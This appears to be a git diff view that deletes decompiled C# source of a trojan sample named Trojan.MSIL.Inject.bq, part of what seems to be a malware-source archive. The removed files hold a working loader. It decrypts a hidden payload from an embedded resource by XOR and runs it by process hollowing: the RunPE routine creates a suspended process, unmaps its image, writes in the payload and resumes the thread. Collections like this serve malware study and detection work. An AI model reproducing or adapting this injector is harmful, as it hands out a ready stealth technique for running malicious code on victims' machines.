public static extern bool VirtualProtectEx(
IntPtr hProc,
IntPtr addr,
IntPtr size,
int newProt,
ref int oldProt);
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
public static extern bool WriteProcessMemory(
IntPtr hProc,
IntPtr baseAddr,
byte[] buff,
IntPtr size,
ref IntPtr numRead);
}
}
}

13
MSIL/Trojan/MSIL/I/Trojan.MSIL.Inject.bq-a33a7103d1724c36da101cc1e56f91622ec28363c418e389d2425f4f83c0484b/AssemblyInfo.cs
View File

@ -1,13 +0,0 @@
using System.Reflection;
using System.Runtime.InteropServices;
[assembly: AssemblyCompany("")]
[assembly: AssemblyTitle("Cursor")]
[assembly: AssemblyCopyright("Copyright © 2010")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyDescription("1")]
[assembly: AssemblyProduct("Cursor")]
[assembly: ComVisible(false)]
[assembly: AssemblyFileVersion("1.0.0.0")]
[assembly: Guid("728093e4-7457-46be-8e8e-0fdee382cfff")]
[assembly: AssemblyVersion("1.0.0.0")]

54
MSIL/Trojan/MSIL/I/Trojan.MSIL.Inject.bq-a33a7103d1724c36da101cc1e56f91622ec28363c418e389d2425f4f83c0484b/Module1.cs
View File

@ -1,54 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: Cursor.Module1
// Assembly: Cursor, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: B150258B-E423-436E-A699-590287945A17
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.MSIL.Inject.bq-a33a7103d1724c36da101cc1e56f91622ec28363c418e389d2425f4f83c0484b.exe
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
namespace Cursor
{
[StandardModule]
internal sealed class Module1
{
[DllImport("kernel32.dll", SetLastError = true)]
private static extern IntPtr FindResource(IntPtr hModule, string lpName, string lpType);
[DllImport("kernel32", EntryPoint = "GetModuleHandleA", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern IntPtr GetModuleHandle([MarshalAs(UnmanagedType.VBByRefStr)] ref string moduleName);
[DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern int SizeofResource(IntPtr hModule, IntPtr hResInfo);
[DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern IntPtr LoadResource(IntPtr hModule, IntPtr hResInfo);
[STAThread]
public static void Main()
{
string moduleName = Process.GetCurrentProcess().MainModule.ModuleName;
IntPtr moduleHandle = Module1.GetModuleHandle(ref moduleName);
IntPtr resource = Module1.FindResource(moduleHandle, "69", "GAY");
IntPtr source = Module1.LoadResource(moduleHandle, resource);
int length = Module1.SizeofResource(moduleHandle, resource);
byte[] numArray = new byte[checked (length - 1 + 1)];
Marshal.Copy(source, numArray, 0, length);
int int32 = BitConverter.ToInt32(numArray, checked (numArray.Length - 4));
byte[] bytes = (byte[]) Utils.CopyArray((Array) numArray, (Array) new byte[checked (numArray.Length - 3 + 1)]);
Random random = new Random(int32);
byte[] buffer = new byte[checked (bytes.Length - 1 + 1)];
random.NextBytes(buffer);
int num = checked (bytes.Length - 1);
int index = 0;
while (index <= num)
{
bytes[index] = (byte) ((int) bytes[index] ^ (int) buffer[index]);
checked { ++index; }
}
x86.RunPE(bytes, Process.GetCurrentProcess().MainModule.FileName);
}
}
}

23
MSIL/Trojan/MSIL/I/Trojan.MSIL.Inject.bq-a33a7103d1724c36da101cc1e56f91622ec28363c418e389d2425f4f83c0484b/My/MyApplication.cs
View File

@ -1,23 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: Cursor.My.MyApplication
// Assembly: Cursor, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: B150258B-E423-436E-A699-590287945A17
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.MSIL.Inject.bq-a33a7103d1724c36da101cc1e56f91622ec28363c418e389d2425f4f83c0484b.exe
using Microsoft.VisualBasic.ApplicationServices;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Diagnostics;
namespace Cursor.My
{
[EditorBrowsable(EditorBrowsableState.Never)]
[GeneratedCode("MyTemplate", "8.0.0.0")]
internal class MyApplication : ConsoleApplicationBase
{
[DebuggerNonUserCode]
public MyApplication()
{
}
}
}

24
MSIL/Trojan/MSIL/I/Trojan.MSIL.Inject.bq-a33a7103d1724c36da101cc1e56f91622ec28363c418e389d2425f4f83c0484b/My/MyComputer.cs
View File

@ -1,24 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: Cursor.My.MyComputer
// Assembly: Cursor, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: B150258B-E423-436E-A699-590287945A17
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.MSIL.Inject.bq-a33a7103d1724c36da101cc1e56f91622ec28363c418e389d2425f4f83c0484b.exe
using Microsoft.VisualBasic.Devices;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Diagnostics;
namespace Cursor.My
{
[EditorBrowsable(EditorBrowsableState.Never)]
[GeneratedCode("MyTemplate", "8.0.0.0")]
internal class MyComputer : Computer
{
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public MyComputer()
{
}
}
}

194
MSIL/Trojan/MSIL/I/Trojan.MSIL.Inject.bq-a33a7103d1724c36da101cc1e56f91622ec28363c418e389d2425f4f83c0484b/My/MyProject.cs
View File

@ -1,194 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: Cursor.My.MyProject
// Assembly: Cursor, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: B150258B-E423-436E-A699-590287945A17
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.MSIL.Inject.bq-a33a7103d1724c36da101cc1e56f91622ec28363c418e389d2425f4f83c0484b.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.ApplicationServices;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.CodeDom.Compiler;
using System.Collections;
using System.ComponentModel;
using System.ComponentModel.Design;
using System.Diagnostics;
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
using System.Windows.Forms;
namespace Cursor.My
{
[GeneratedCode("MyTemplate", "8.0.0.0")]
[StandardModule]
[HideModuleName]
internal sealed class MyProject
{
private static readonly MyProject.ThreadSafeObjectProvider<MyComputer> m_ComputerObjectProvider = new MyProject.ThreadSafeObjectProvider<MyComputer>();
private static readonly MyProject.ThreadSafeObjectProvider<MyApplication> m_AppObjectProvider = new MyProject.ThreadSafeObjectProvider<MyApplication>();
private static readonly MyProject.ThreadSafeObjectProvider<User> m_UserObjectProvider = new MyProject.ThreadSafeObjectProvider<User>();
private static MyProject.ThreadSafeObjectProvider<MyProject.MyForms> m_MyFormsObjectProvider = new MyProject.ThreadSafeObjectProvider<MyProject.MyForms>();
private static readonly MyProject.ThreadSafeObjectProvider<MyProject.MyWebServices> m_MyWebServicesObjectProvider = new MyProject.ThreadSafeObjectProvider<MyProject.MyWebServices>();
[DebuggerNonUserCode]
static MyProject()
{
}
[HelpKeyword("My.Computer")]
internal static MyComputer Computer
{
[DebuggerHidden] get => MyProject.m_ComputerObjectProvider.GetInstance;
}
[HelpKeyword("My.Application")]
internal static MyApplication Application
{
[DebuggerHidden] get => MyProject.m_AppObjectProvider.GetInstance;
}
[HelpKeyword("My.User")]
internal static User User
{
[DebuggerHidden] get => MyProject.m_UserObjectProvider.GetInstance;
}
[HelpKeyword("My.Forms")]
internal static MyProject.MyForms Forms
{
[DebuggerHidden] get => MyProject.m_MyFormsObjectProvider.GetInstance;
}
[HelpKeyword("My.WebServices")]
internal static MyProject.MyWebServices WebServices
{
[DebuggerHidden] get => MyProject.m_MyWebServicesObjectProvider.GetInstance;
}
[MyGroupCollection("System.Windows.Forms.Form", "Create__Instance__", "Dispose__Instance__", "My.MyProject.Forms")]
[EditorBrowsable(EditorBrowsableState.Never)]
internal sealed class MyForms
{
[ThreadStatic]
private static Hashtable m_FormBeingCreated;
[DebuggerHidden]
private static T Create__Instance__<T>(T Instance) where T : Form, new()
{
if ((object) Instance != null && !Instance.IsDisposed)
return Instance;
if (MyProject.MyForms.m_FormBeingCreated != null)
{
if (MyProject.MyForms.m_FormBeingCreated.ContainsKey((object) typeof (T)))
throw new InvalidOperationException(Utils.GetResourceString("WinForms_RecursiveFormCreate"));
}
else
MyProject.MyForms.m_FormBeingCreated = new Hashtable();
MyProject.MyForms.m_FormBeingCreated.Add((object) typeof (T), (object) null);
try
{
return new T();
}
catch (TargetInvocationException ex) when (
{
// ISSUE: unable to correctly present filter
ProjectData.SetProjectError((Exception) ex);
if (ex.InnerException != null)
{
SuccessfulFiltering;
}
else
throw;
}
)
{
throw new InvalidOperationException(Utils.GetResourceString("WinForms_SeeInnerException", ex.InnerException.Message), ex.InnerException);
}
finally
{
MyProject.MyForms.m_FormBeingCreated.Remove((object) typeof (T));
}
}
[DebuggerHidden]
private void Dispose__Instance__<T>(ref T instance) where T : Form
{
instance.Dispose();
instance = default (T);
}
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public MyForms()
{
}
[EditorBrowsable(EditorBrowsableState.Never)]
public override bool Equals(object o) => base.Equals(RuntimeHelpers.GetObjectValue(o));
[EditorBrowsable(EditorBrowsableState.Never)]
public override int GetHashCode() => base.GetHashCode();
[EditorBrowsable(EditorBrowsableState.Never)]
internal new System.Type GetType() => typeof (MyProject.MyForms);
[EditorBrowsable(EditorBrowsableState.Never)]
public override string ToString() => base.ToString();
}
[EditorBrowsable(EditorBrowsableState.Never)]
[MyGroupCollection("System.Web.Services.Protocols.SoapHttpClientProtocol", "Create__Instance__", "Dispose__Instance__", "")]
internal sealed class MyWebServices
{
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public override bool Equals(object o) => base.Equals(RuntimeHelpers.GetObjectValue(o));
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public override int GetHashCode() => base.GetHashCode();
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
internal new System.Type GetType() => typeof (MyProject.MyWebServices);
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public override string ToString() => base.ToString();
[DebuggerHidden]
private static T Create__Instance__<T>(T instance) where T : new() => (object) instance == null ? new T() : instance;
[DebuggerHidden]
private void Dispose__Instance__<T>(ref T instance) => instance = default (T);
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public MyWebServices()
{
}
}
[EditorBrowsable(EditorBrowsableState.Never)]
[ComVisible(false)]
internal sealed class ThreadSafeObjectProvider<T> where T : new()
{
internal T GetInstance
{
[DebuggerHidden] get
{
if ((object) MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue == null)
MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue = new T();
return MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue;
}
}
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public ThreadSafeObjectProvider()
{
}
}
}
}

36
MSIL/Trojan/MSIL/I/Trojan.MSIL.Inject.bq-a33a7103d1724c36da101cc1e56f91622ec28363c418e389d2425f4f83c0484b/My/MySettings.cs
View File

@ -1,36 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: Cursor.My.MySettings
// Assembly: Cursor, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: B150258B-E423-436E-A699-590287945A17
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.MSIL.Inject.bq-a33a7103d1724c36da101cc1e56f91622ec28363c418e389d2425f4f83c0484b.exe
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Configuration;
using System.Diagnostics;
using System.Runtime.CompilerServices;
namespace Cursor.My
{
[EditorBrowsable(EditorBrowsableState.Advanced)]
[CompilerGenerated]
[GeneratedCode("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "9.0.0.0")]
internal sealed class MySettings : ApplicationSettingsBase
{
private static MySettings defaultInstance = (MySettings) SettingsBase.Synchronized((SettingsBase) new MySettings());
[DebuggerNonUserCode]
public MySettings()
{
}
public static MySettings Default
{
get
{
MySettings defaultInstance = MySettings.defaultInstance;
return defaultInstance;
}
}
}
}

31
MSIL/Trojan/MSIL/I/Trojan.MSIL.Inject.bq-a33a7103d1724c36da101cc1e56f91622ec28363c418e389d2425f4f83c0484b/My/MySettingsProperty.cs
View File

@ -1,31 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: Cursor.My.MySettingsProperty
// Assembly: Cursor, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: B150258B-E423-436E-A699-590287945A17
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.MSIL.Inject.bq-a33a7103d1724c36da101cc1e56f91622ec28363c418e389d2425f4f83c0484b.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System.ComponentModel.Design;
using System.Diagnostics;
using System.Runtime.CompilerServices;
namespace Cursor.My
{
[DebuggerNonUserCode]
[HideModuleName]
[StandardModule]
[CompilerGenerated]
internal sealed class MySettingsProperty
{
[HelpKeyword("My.Settings")]
internal static MySettings Settings
{
get
{
MySettings settings = MySettings.Default;
return settings;
}
}
}
}

46
MSIL/Trojan/MSIL/I/Trojan.MSIL.Inject.bq-a33a7103d1724c36da101cc1e56f91622ec28363c418e389d2425f4f83c0484b/My/Resources/Resources.cs
View File

@ -1,46 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: Cursor.My.Resources.Resources
// Assembly: Cursor, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: B150258B-E423-436E-A699-590287945A17
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.MSIL.Inject.bq-a33a7103d1724c36da101cc1e56f91622ec28363c418e389d2425f4f83c0484b.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Diagnostics;
using System.Globalization;
using System.Resources;
using System.Runtime.CompilerServices;
namespace Cursor.My.Resources
{
[HideModuleName]
[GeneratedCode("System.Resources.Tools.StronglyTypedResourceBuilder", "2.0.0.0")]
[StandardModule]
[DebuggerNonUserCode]
[CompilerGenerated]
internal sealed class Resources
{
private static ResourceManager resourceMan;
private static CultureInfo resourceCulture;
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal static ResourceManager ResourceManager
{
get
{
if (object.ReferenceEquals((object) Cursor.My.Resources.Resources.resourceMan, (object) null))
Cursor.My.Resources.Resources.resourceMan = new ResourceManager("Cursor.Resources", typeof (Cursor.My.Resources.Resources).Assembly);
return Cursor.My.Resources.Resources.resourceMan;
}
}
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal static CultureInfo Culture
{
get => Cursor.My.Resources.Resources.resourceCulture;
set => Cursor.My.Resources.Resources.resourceCulture = value;
}
}
}

120
MSIL/Trojan/MSIL/I/Trojan.MSIL.Inject.bq-a33a7103d1724c36da101cc1e56f91622ec28363c418e389d2425f4f83c0484b/Resources.resx
View File

@ -1,120 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<root>
<!--
Microsoft ResX Schema
Version 2.0
The primary goals of this format is to allow a simple XML format
that is mostly human readable. The generation and parsing of the
various data types are done through the TypeConverter classes
associated with the data types.
Example:
... ado.net/XML headers & schema ...
<resheader name="resmimetype">text/microsoft-resx</resheader>
<resheader name="version">2.0</resheader>
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
<value>[base64 mime encoded serialized .NET Framework object]</value>
</data>
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
<comment>This is a comment</comment>
</data>
There are any number of "resheader" rows that contain simple
name/value pairs.
Each data row contains a name, and value. The row also contains a
type or mimetype. Type corresponds to a .NET class that support
text/value conversion through the TypeConverter architecture.
Classes that don't support this are serialized and stored with the
mimetype set.
The mimetype is used for serialized objects, and tells the
ResXResourceReader how to depersist the object. This is currently not
extensible. For a given mimetype the value must be set accordingly:
Note - application/x-microsoft.net.object.binary.base64 is the format
that the ResXResourceWriter will generate, however the reader can
read any of the formats listed below.
mimetype: application/x-microsoft.net.object.binary.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.soap.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.bytearray.base64
value : The object must be serialized into a byte array
: using a System.ComponentModel.TypeConverter
: and then encoded with base64 encoding.
-->
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
<xsd:element name="root" msdata:IsDataSet="true">
<xsd:complexType>
<xsd:choice maxOccurs="unbounded">
<xsd:element name="metadata">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" />
</xsd:sequence>
<xsd:attribute name="name" use="required" type="xsd:string" />
<xsd:attribute name="type" type="xsd:string" />
<xsd:attribute name="mimetype" type="xsd:string" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="assembly">
<xsd:complexType>
<xsd:attribute name="alias" type="xsd:string" />
<xsd:attribute name="name" type="xsd:string" />
</xsd:complexType>
</xsd:element>
<xsd:element name="data">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="resheader">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" />
</xsd:complexType>
</xsd:element>
</xsd:choice>
</xsd:complexType>
</xsd:element>
</xsd:schema>
<resheader name="resmimetype">
<value>text/microsoft-resx</value>
</resheader>
<resheader name="version">
<value>2.0</value>
</resheader>
<resheader name="reader">
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<resheader name="writer">
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
</root>

52
MSIL/Trojan/MSIL/I/Trojan.MSIL.Inject.bq-a33a7103d1724c36da101cc1e56f91622ec28363c418e389d2425f4f83c0484b/Trojan.MSIL.Inject.bq.csproj
View File

@ -1,52 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.MSIL.Inject.bq-a33a7103d1724c36da101cc1e56f91622ec28363c418e389d2425f4f83c0484b.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{B6BCD142-F7F0-4820-B7E0-DEE238AEEB62}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>Cursor</AssemblyName>
<ApplicationVersion>1.0.0.0</ApplicationVersion>
<RootNamespace>Cursor</RootNamespace>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="Microsoft.VisualBasic" />
<Reference Include="System" />
<Reference Include="System.Windows.Forms" />
</ItemGroup>
<ItemGroup>
<Compile Include="Module1.cs" />
<Compile Include="x86.cs" />
<Compile Include="My\MyApplication.cs" />
<Compile Include="My\MyComputer.cs" />
<Compile Include="My\MyProject.cs" />
<Compile Include="My\MySettings.cs" />
<Compile Include="My\MySettingsProperty.cs" />
<Compile Include="My\Resources\Resources.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<EmbeddedResource Include="Resources.resx" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>

20
MSIL/Trojan/MSIL/I/Trojan.MSIL.Inject.bq-a33a7103d1724c36da101cc1e56f91622ec28363c418e389d2425f4f83c0484b/Trojan.MSIL.Inject.bq.sln
View File

@ -1,20 +0,0 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Cursor", "Trojan.MSIL.Inject.bq-a33a7103d1724c36da101cc1e56f91622ec28363c418e389d2425f4f83c0484b.csproj", "{B6BCD142-F7F0-4820-B7E0-DEE238AEEB62}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{B6BCD142-F7F0-4820-B7E0-DEE238AEEB62}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{B6BCD142-F7F0-4820-B7E0-DEE238AEEB62}.Debug|Any CPU.Build.0 = Debug|Any CPU
{B6BCD142-F7F0-4820-B7E0-DEE238AEEB62}.Release|Any CPU.ActiveCfg = Release|Any CPU
{B6BCD142-F7F0-4820-B7E0-DEE238AEEB62}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal

170
MSIL/Trojan/MSIL/I/Trojan.MSIL.Inject.bq-a33a7103d1724c36da101cc1e56f91622ec28363c418e389d2425f4f83c0484b/x86.cs
View File

@ -1,170 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: Cursor.x86
// Assembly: Cursor, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: B150258B-E423-436E-A699-590287945A17
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.MSIL.Inject.bq-a33a7103d1724c36da101cc1e56f91622ec28363c418e389d2425f4f83c0484b.exe
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Security;
using System.Text;
namespace Cursor
{
public class x86
{
private static readonly int[] prot = new int[8]
{
1,
16,
2,
32,
4,
64,
4,
64
};
[DebuggerNonUserCode]
public x86()
{
}
public static void RunPE(byte[] bytes, string surrogateProcess)
{
int int32 = BitConverter.ToInt32(bytes, 60);
int int16 = (int) BitConverter.ToInt16(bytes, checked (int32 + 6));
IntPtr size1 = new IntPtr(BitConverter.ToInt32(bytes, checked (int32 + 84)));
byte[] sInfo = new byte[68];
IntPtr[] pInfo = new IntPtr[4];
IntPtr num1;
if (!x86.Win32.CreateProcess((string) null, new StringBuilder(surrogateProcess), num1, num1, false, 4, num1, (string) null, sInfo, pInfo))
return;
uint[] ctxt = new uint[179];
ctxt[0] = 65538U;
IntPtr bufr;
IntPtr numRead;
if (x86.Win32.GetThreadContext(pInfo[1], ctxt) && x86.Win32.ReadProcessMemory(pInfo[0], new IntPtr(checked ((long) ctxt[41] + 8L)), ref bufr, new IntPtr(4), ref numRead) && x86.Win32.NtUnmapViewOfSection(pInfo[0], bufr) == 0U)
{
IntPtr hProc1 = pInfo[0];
IntPtr num2 = new IntPtr(BitConverter.ToInt32(bytes, checked (int32 + 52)));
IntPtr addr1 = num2;
IntPtr num3 = new IntPtr(BitConverter.ToInt32(bytes, checked (int32 + 80)));
IntPtr size2 = num3;
IntPtr baseAddr1 = x86.Win32.VirtualAllocEx(hProc1, addr1, size2, 12288, 64);
bool flag = x86.Win32.WriteProcessMemory(pInfo[0], baseAddr1, bytes, size1, ref numRead);
int num4 = checked (int16 - 1);
int num5 = 0;
while (num5 <= num4)
{
int[] dst1 = new int[10];
Buffer.BlockCopy((Array) bytes, checked (int32 + 248 + num5 * 40), (Array) dst1, 0, 40);
byte[] dst2 = new byte[checked (dst1[4] - 1 + 1)];
Buffer.BlockCopy((Array) bytes, dst1[5], (Array) dst2, 0, dst2.Length);
IntPtr hProc2 = pInfo[0];
num3 = new IntPtr(checked (baseAddr1.ToInt32() + dst1[3]));
IntPtr baseAddr2 = num3;
byte[] buff = dst2;
num2 = new IntPtr(dst2.Length);
IntPtr size3 = num2;
ref IntPtr local1 = ref numRead;
flag = x86.Win32.WriteProcessMemory(hProc2, baseAddr2, buff, size3, ref local1);
IntPtr hProc3 = pInfo[0];
num3 = new IntPtr(checked (baseAddr1.ToInt32() + dst1[3]));
IntPtr addr2 = num3;
num2 = new IntPtr(dst1[2]);
IntPtr size4 = num2;
int newProt = x86.prot[dst1[9] >> 29 & 7];
int num6;
ref int local2 = ref num6;
flag = x86.Win32.VirtualProtectEx(hProc3, addr2, size4, newProt, ref local2);
checked { ++num5; }
}
IntPtr hProc4 = pInfo[0];
num3 = new IntPtr(checked ((long) ctxt[41] + 8L));
IntPtr baseAddr3 = num3;
byte[] bytes1 = BitConverter.GetBytes(baseAddr1.ToInt32());
num2 = new IntPtr(4);
IntPtr size5 = num2;
ref IntPtr local = ref numRead;
flag = x86.Win32.WriteProcessMemory(hProc4, baseAddr3, bytes1, size5, ref local);
ctxt[44] = checked ((uint) (baseAddr1.ToInt32() + BitConverter.ToInt32(bytes, int32 + 40)));
x86.Win32.SetThreadContext(pInfo[1], ctxt);
}
x86.Win32.ResumeThread(pInfo[1]);
}
[SuppressUnmanagedCodeSecurity]
private class Win32
{
[DebuggerNonUserCode]
public Win32()
{
}
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
public static extern bool CreateProcess(
string appName,
StringBuilder commandLine,
IntPtr procAttr,
IntPtr thrAttr,
[MarshalAs(UnmanagedType.Bool)] bool inherit,
int creation,
IntPtr env,
string curDir,
byte[] sInfo,
IntPtr[] pInfo);
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
public static extern bool GetThreadContext(IntPtr hThr, uint[] ctxt);
[DllImport("ntdll")]
public static extern uint NtUnmapViewOfSection(IntPtr hProc, IntPtr baseAddr);
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
public static extern bool ReadProcessMemory(
IntPtr hProc,
IntPtr baseAddr,
ref IntPtr bufr,
IntPtr bufrSize,
ref IntPtr numRead);
[DllImport("kernel32")]
public static extern int ResumeThread(IntPtr hThr);
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
public static extern bool SetThreadContext(IntPtr hThr, uint[] ctxt);
[DllImport("kernel32")]
public static extern IntPtr VirtualAllocEx(
IntPtr hProc,
IntPtr addr,
IntPtr size,
int allocType,
int prot);
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
public static extern bool VirtualProtectEx(
IntPtr hProc,
IntPtr addr,
IntPtr size,
int newProt,
ref int oldProt);
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
public static extern bool WriteProcessMemory(
IntPtr hProc,
IntPtr baseAddr,
byte[] buff,
IntPtr size,
ref IntPtr numRead);
}
}
}

13
MSIL/Trojan/MSIL/I/Trojan.MSIL.Inject.bq-cb05910e02cb9c65998c535063ecbe9f285f7a937d2791e860eb6799ad56067b/AssemblyInfo.cs
View File

@ -1,13 +0,0 @@
using System.Reflection;
using System.Runtime.InteropServices;
[assembly: AssemblyCompany("")]
[assembly: AssemblyTitle("Cursor")]
[assembly: AssemblyCopyright("Copyright © 2010")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyDescription("1")]
[assembly: AssemblyProduct("Cursor")]
[assembly: ComVisible(false)]
[assembly: AssemblyFileVersion("1.0.0.0")]
[assembly: Guid("728093e4-7457-46be-8e8e-0fdee382cfff")]
[assembly: AssemblyVersion("1.0.0.0")]

Some files were not shown because too many files have changed in this diff Show More